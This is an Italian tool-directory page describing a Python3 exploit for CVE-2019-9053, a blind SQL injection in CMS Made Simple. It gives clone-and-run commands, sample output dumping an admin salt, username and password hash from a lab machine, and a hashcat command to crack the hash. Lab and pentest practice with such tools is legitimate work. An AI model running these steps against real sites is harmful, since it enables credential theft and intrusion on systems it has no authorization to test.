Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/tim-karov/cmsms-sqli
Password CrackingAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebCTFPenetration Testing
GitHubtim-karov/cmsms-sqli

cmsms-sqli

Exploit Python3 per CVE-2019-9053 (CMS Made Simple <= 2.2.9 SQLi). Nessuna dipendenza, blind SQLi basata sul tempo → dump delle credenziali admin. Writeup HTB: owned.

Vedi Repository
57 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CMS Made Simple <= 2.2.9 SQL Injection (CVE-2019-9053) - Exploit Python3

Porting Python3 puro dell'exploit originale Exploit-DB #46635 di Daniele Scanu. SQLi blind basata sul tempo per estrarre le credenziali admin da installazioni CMS Made Simple vulnerabili.

🎯 Caratteristiche:

✅ Nessuna dipendenza esterna (solo requests)

✅ Python 3.6+ nativo (f-strings, walrus operator)

✅ Bell'output colorato (ANSI)

✅ Stabile e veloce (~3-5 min di dump su connessioni nella media)

✅ Gestione di timeout/errori per target in produzione

✅ Output pronto per Hashcat (formato salt + MD5)

🚀 Utilizzo:

root@kitploit:~
# Clone & run
git clone https://github.com/tim-karov/cmsms-sqli
cd cmsms-sqli
python3 cmsms-sqli.py url
root@kitploit:~
# Example output (HTB Writeup):
[+] CVE-2019-9053 CMS Made Simple SQLi (Python3)
[+] Target: http://machine_ip/writeup/moduleinterface.php?mact=News,m1_,default,0
[+] Dumping SALT...
5a599ef579066807
[+] Salt: L7b8v5p3
[+] Dumping USERNAME...
jkr
[+] Username: jkr
[+] Dumping PASSWORD MD5...
62def4866937f08cc13bab43bb14e6f7
[+] MD5 Hash: 62def4866937f08cc13bab43bb14e6f7
[+] Crack: hashcat -a 0 -m 20 '62def4866937f08cc13bab43bb14e6f7:5a599ef579066807' /usr/share/wordlists/rockyou.txt

🔧 Personalizzazione:

root@kitploit:~
TIME = 3      # Sleep time (slower = more stable)
timeout = 20  # Request timeout
chars = '...' # Custom charset

📝 Crediti:

Autore originale: Daniele Scanu

Exploit-DB: #46635

Porting Python3 e miglioramenti: Tim Karov

📄 Licenza:

Licenza MIT - Vedi LICENSE


⭐ Metti una stella se ti è utile! Usato nei lab HTB/TryHackMe e nei pentest reali.

Scarica lo strumento